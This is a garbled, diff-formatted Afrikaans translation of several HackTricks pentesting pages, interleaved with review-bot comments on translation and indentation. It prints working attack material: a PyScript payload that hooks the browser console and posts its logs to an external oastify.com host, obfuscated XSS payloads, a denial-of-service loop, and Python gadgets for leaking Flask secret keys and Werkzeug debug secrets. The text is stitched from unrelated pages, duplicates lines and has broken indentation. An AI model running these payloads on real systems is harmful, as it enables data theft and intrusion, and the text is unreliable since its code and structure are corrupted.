### [OOB Data Exfiltration van die Emscripten virtuele geheue-lêersisteem (konsole monitering)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
|
||||
|
||||
`CVE ID: CVE-2022-30286`\
|
||||
\
|
||||
Code:
|
||||
|
||||
Kode:
|
||||
```html
|
||||
<py-script>
|
||||
<py-script>
|
||||
x = "CyberGuy"
|
||||
if x == "CyberGuy":
|
||||
with open('/lib/python3.10/asyncio/tasks.py') as output:
|
||||
contents = output.read()
|
||||
print(contents)
|
||||
with open('/lib/python3.10/asyncio/tasks.py') as output:
|
||||
contents = output.read()
|
||||
print(contents)
|
||||
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
|
||||
</py-script>
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
|
||||
|
||||
### Cross Site Scripting (Ordinary)
|
||||
|
||||
Code:
|
||||
### Kruiswebkrips (Gewoonlik)
|
||||
|
||||
Kode:
|
||||
```python
|
||||
<py-script>
|
||||
print("<img src=x onerror='alert(document.domain)'>")
|
||||
print("<img src=x onerror='alert(document.domain)'>")
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
|
||||
|
||||
### Cross Site Scripting (Python Obfuscated)
|
||||
|
||||
Code:
|
||||
### Kruiswebkripsing (Python Versteur)
|
||||
|
||||
Kode:
|
||||
```python
|
||||
<py-script>
|
||||
sur = "\u0027al";fur = "e";rt = "rt"
|
||||
|
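Review bot: The Python inside the two `<py-script>` blocks in this hunk is dedented in the new version (`with open(...) as fin:` is followed by an unindented `out = fin.read()`, and the `if x == "CyberGuy":` block likewise), so both examples would raise `IndentationError` in the browser instead of reading the file; restore the old-side indentation. Translation points in the same hunk: "Result:" is left untranslated on three occasions while "Code:" became "Kode:"; "geheuebestandstelsel" (Dutch) and "geheue-lêersisteem" are used for the same "virtual memory filesystem", and Afrikaans would be "lêerstelsel"; "Kruiswebkrips (Gewoonlik)" reads as "usually", where "Gewone" is meant for "Ordinary"; "Versteur" means "disturbed", whereas the next heading in this diff already uses "verduistering" for "Obfuscated", so use that and make "Kruiswebkrips"/"Kruiswebkripsing" consistent. Leaving "Cross Site Scripting" untranslated would also be acceptable, since the acronym XSS is the term readers will search for.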
@ -86,50 +79,45 @@ y = "o";m = "ner";z = "ror\u003d"
|
|||
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
|
||||
|
||||
### Cross Site Scripting (JavaScript Obfuscation)
|
||||
|
||||
Code:
|
||||
### Kruiswebkrips (JavaScript-verduistering)
|
||||
|
||||
Kode:
|
||||
```html
|
||||
<py-script>
|
||||
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
|
||||
</py-script>
|
||||
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
|
||||
|
||||
### DoS attack (Infinity loop)
|
||||
|
||||
Code:
|
||||
### DoS-aanval (Oneindige lus)
|
||||
|
||||
Kode:
|
||||
```html
|
||||
<py-script>
|
||||
while True:
|
||||
print(" ")
|
||||
</py-script>
|
||||
<py-script>
|
||||
while True:
|
||||
print(" ")
|
||||
</py-script>
|
||||
```
|
||||
|
||||
Result:
|
||||
|
||||
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
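Review bot: The DoS example is broken by the dedent: `while True:` is now followed by an unindented `print(" ")`, which is an `IndentationError`, so restore the old-side indentation. The `prinht(` typo in the JavaScript-obfuscation example is carried over unchanged from the old side; since the translation touches this line anyway, it should become `print(` so the example actually emits the `<script>` tag it describes.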
@ -1,37 +1,35 @@
|
|||
# Python Internal Read Gadgets
|
||||
# Python Interne Lees Gadgets
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Basic Information
|
||||
## Basiese Inligting
|
||||
|
||||
Different vulnerabilities such as [**Python Format Strings**](bypass-python-sandboxes/#python-format-string) or [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) might allow you to **read python internal data but won't allow you to execute code**. Therefore, a pentester will need to make the most of these read permissions to **obtain sensitive privileges and escalate the vulnerability**.
|
||||
Verskillende kwesbaarhede soos [**Python-formaatreekse**](bypass-python-sandboxes/#python-format-string) of [**Klasverontreiniging**](class-pollution-pythons-prototype-pollution.md) mag jou in staat stel om **Python interne data te lees, maar sal nie toelaat dat jy kode uitvoer nie**. Daarom sal 'n pentester die meeste uit hierdie leesregte moet maak om **gevoelige bevoegdhede te verkry en die kwesbaarheid te eskaleer**.
|
||||
|
||||
### Flask - Read secret key
|
||||
|
||||
The main page of a Flask application will probably have the **`app`** global object where this **secret is configured**.
|
||||
### Flask - Lees geheime sleutel
|
||||
|
||||
Die hoofbladsy van 'n Flask-toepassing sal waarskynlik die **`app`** globale objek hê waarin hierdie **geheime sleutel gekonfigureer** is.
|
||||
```python
|
||||
app = Flask(__name__, template_folder='templates')
|
||||
app.secret_key = '(:secret:)'
|
||||
```
|
||||
In hierdie geval is dit moontlik om toegang tot hierdie objek te verkry deur enige gadget te gebruik om **globale objekte te benader** vanaf die [**Bypass Python sandboxes page**](bypass-python-sandboxes/).
|
||||
|
||||
In this case it's possible to access this object just using any gadget to **access global objects** from the [**Bypass Python sandboxes page**](bypass-python-sandboxes/).
|
||||
In die geval waar **die kwesbaarheid in 'n ander Python-lêer is**, het jy 'n gadget nodig om deur lêers te blaai om by die hooflêer te kom om die globale objek `app.secret_key` te **benader** om die Flask-geheime sleutel te verander en in staat te wees om [**voorregte te verhoog** deur hierdie sleutel te ken](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
|
||||
|
||||
In the case where **the vulnerability is in a different python file**, you need a gadget to traverse files to get to the main one to **access the global object `app.secret_key`** to change the Flask secret key and be able to [**escalate privileges** knowing this key](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).
|
||||
|
||||
A payload like this one [from this writeup](https://ctftime.org/writeup/36082):
|
||||
'n Payload soos hierdie een [vanaf hierdie writeup](https://ctftime.org/writeup/36082):
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```python
|
||||
|
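Review bot: the link texts for cross-referenced techniques are translated while the pages they point to keep their English titles, so `[**Python-formaatreekse**](bypass-python-sandboxes/#python-format-string)` and `[**Klasverontreiniging**](class-pollution-pythons-prototype-pollution.md)` no longer match the heading a reader lands on when following the link. Suggest keeping the established names "Python Format Strings" and "Class Pollution" as the link text, with the Afrikaans gloss in parentheses if wanted, so link text and target page agree. Leaving the payload under `{% code overflow="wrap" %}` untouched is right; the same should apply to technique names that double as page titles.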
@ -39,33 +37,31 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
Use this payload to **change `app.secret_key`** (the name in your app might be different) to be able to sign new and more privileges flask cookies.
|
||||
Gebruik hierdie payload om die `app.secret_key` (die naam in jou app mag verskil) te **verander** sodat jy nuwe en meer bevoegdhede flask koekies kan onderteken.
|
||||
|
||||
### Werkzeug - machine\_id and node uuid
|
||||
|
||||
[**Using these payload from this writeup**](https://vozec.fr/writeups/tweedle-dum-dee/) you will be able to access the **machine\_id** and the **uuid** node, which are the **main secrets** you need to [**generate the Werkzeug pin**](../../network-services-pentesting/pentesting-web/werkzeug.md) you can use to access the python console in `/console` if the **debug mode is enabled:**
|
||||
### Werkzeug - machine\_id en node uuid
|
||||
|
||||
[**Deur hierdie payload van hierdie writeup**](https://vozec.fr/writeups/tweedle-dum-dee/) te gebruik, sal jy toegang hê tot die **machine\_id** en die **uuid** node, wat die **hoofgeheime** is wat jy nodig het om die [**Werkzeug pin te genereer**](../../network-services-pentesting/pentesting-web/werkzeug.md) wat jy kan gebruik om toegang te verkry tot die python-konsole in `/console` as die **foutopsporingsmodus geaktiveer is:**
|
||||
```python
|
||||
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
|
||||
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
|
||||
```
|
||||
|
||||
{% hint style="warning" %}
|
||||
Note that you can get the **servers local path to the `app.py`** generating some **error** in the web page which will **give you the path**.
|
||||
Let daarop dat jy die **bedieners se plaaslike pad na die `app.py`** kan kry deur 'n **fout** op die webblad te genereer wat jou die pad sal gee.
|
||||
{% endhint %}
|
||||
|
||||
If the vulnerability is in a different python file, check the previous Flask trick to access the objects from the main python file.
|
||||
As die kwesbaarheid in 'n ander Python-lêer is, kyk na die vorige Flask-truuk om toegang tot die voorwerpe van die hoof-Python-lêer te verkry.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
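Review bot: the footer block is translated differently here than in the copy at the top of this same file: `* Kry die [**amptelike PEASS & HackTricks-uitrusting**]` versus the earlier `* Kry die [**amptelike PEASS & HackTricks swag**]`, and `* **Deel jou haktruuks deur PR's in te dien by die**` ending in `GitHub-opslagplekke` versus `hacktruuks` and `github-repos` above. Since this footer is pasted into every page, translate it once and reuse the identical string (one spelling, "hacktruuks", and one term for "repos", keeping "GitHub" capitalised as a proper noun) rather than re-translating per occurrence; otherwise the drift is reproduced in every file this commit touches.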
@ -2,26 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
```bash
|
||||
sudo apt-get install python3-venv
|
||||
#Now, go to the folder you want to create the virtual environment
|
||||
|
@ -40,25 +39,23 @@ is fixed running
|
|||
pip3 install wheel
|
||||
inside the virtual environment
|
||||
```
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
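Review bot: the Trickest banner translation drops the `**...**` emphasis and changes casing relative to the identical banner at the top of this file: `Gebruik [**Trickest**](...) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\` followed by `Kry Vandag Toegang:` here, versus `om maklik **werkstrome** te bou en outomatiseer ... die wêreld se **mees gevorderde** gemeenskapsinstrumente.\` and `Kry vandag toegang:` earlier. Suggest one fixed translation of the banner that keeps the bold markers from the English line, reused wherever the banner appears; the trailing `\` line breaks and the `{% embed url=... %}` line are correctly preserved and should stay byte-identical across copies too.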
@ -1,29 +1,28 @@
|
|||
# Web Requests
|
||||
# Web Versoeke
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Python Requests
|
||||
|
||||
## Python Versoeke
|
||||
```python
|
||||
import requests
|
||||
|
||||
|
